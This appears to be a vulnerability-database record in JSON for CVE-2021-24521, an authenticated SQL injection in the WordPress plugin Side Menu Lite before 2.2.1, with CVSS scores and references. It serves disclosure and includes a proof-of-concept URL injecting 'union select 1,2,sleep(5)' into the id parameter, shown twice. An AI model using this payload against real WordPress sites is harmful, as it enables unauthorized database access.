The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.
{"id": "WPEX-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD", "type": "wpexploit", "bulletinFamily": "exploit", "title": "Side Menu Lite < 2.2.1 - Authenticated SQL Injection", "description": "The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.\n", "published": "2021-06-28T00:00:00", "modified": "2021-07-12T18:42:05", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cvss2": {}, "cvss3": {}, "href": "", "reporter": "pang0lin @webray.com.cn inc", "references": ["https://github.com/pang0lin/CVEproject/blob/main/wordpress_side-menu-lite_sqli.md"], "cvelist": ["CVE-2021-24521"], "immutableFields": [], "lastseen": "2021-09-14T23:36:17", "viewCount": 121, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2021-24521"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"]}], "rev": 4}, "score": {"value": 5.1, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2021-24521"]}, {"type": "wpvulndb", "idList": ["WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD"]}]}, "exploitation": null, "vulnersScore": 5.1}, "sourceData": "http://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab=add-new&act=duplicate&id=0 union select 1,2,sleep(5)\r\n\r\nVisiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.", "generation": 0, "_state": {"dependencies": 1646292838}}
{"cve": [{"lastseen": "2022-03-23T14:56:23", "description": "The Side Menu Lite \u00e2\u20ac\u201c add sticky fixed buttons WordPress plugin before 2.2.1 does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.", "cvss3": {"exploitabilityScore": 1.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "baseScore": 7.2, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-09T10:15:00", "type": "cve", "title": "CVE-2021-24521", "cwe": ["CWE-89"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.5, "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-24521"], "modified": "2021-08-17T16:35:00", "cpe": [], "id": "CVE-2021-24521", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-24521", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "cpe23": []}], "wpvulndb": [{"lastseen": "2021-09-14T23:36:17", "description": "The plugin does not properly sanitize input values from the browser when building an SQL statement. Users with the administrator role or permission to manage this plugin could perform an SQL Injection attack.\n\n### PoC\n\nhttp://www.example.com/wp-admin/admin.php?page=side-menu-lite&tab;=add-new&act;=duplicate&id;=0 union select 1,2,sleep(5) Visiting the page will be delayed by 5 seconds, due to the sleep(5) injected in to the SQL query.\n", "cvss3": {}, "published": "2021-06-28T00:00:00", "type": "wpvulndb", "title": "Side Menu Lite < 2.2.1 - Authenticated SQL Injection", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2021-24521"], "modified": "2021-07-12T18:42:05", "id": "WPVDB-ID:EB21EBC5-265C-4378-B2C6-62F6BC2F69CD", "href": "https://wpscan.com/vulnerability/eb21ebc5-265c-4378-b2c6-62f6bc2f69cd", "sourceData": "", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}}]}